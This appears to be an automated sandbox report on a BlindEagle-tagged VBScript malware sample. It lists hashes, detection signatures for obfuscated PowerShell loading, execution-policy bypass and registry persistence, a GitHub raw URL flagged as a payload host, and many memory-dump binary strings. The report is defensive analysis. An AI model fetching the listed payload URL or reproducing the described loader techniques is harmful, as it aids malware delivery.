Windows Analysis Report
WW8kzvnphl.vbs

Overview

General Information

Sample name: WW8kzvnphl.vbs
renamed because original name is a hash value
Original sample name: 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs
Analysis ID: 1523826
MD5: adadc5d47f87dd519f9a7da9ba03daf5
SHA1: 3de39ed4ff76305d9dc87b484bf2b78d7f332dbf
SHA256: 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd
Tags: BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Command shell drops VBS files
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

barindex
Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt Virustotal: Detection: 6% Perma Link
Source: WW8kzvnphl.vbs ReversingLabs: Detection: 13%
Source: Submited Sample Integrated Neural Analysis Model: Matched 97.9% probability
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb[ source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbpdb` source: powershell.exe, 00000003.00000002.2202319158.0000022A9B4E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B82B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
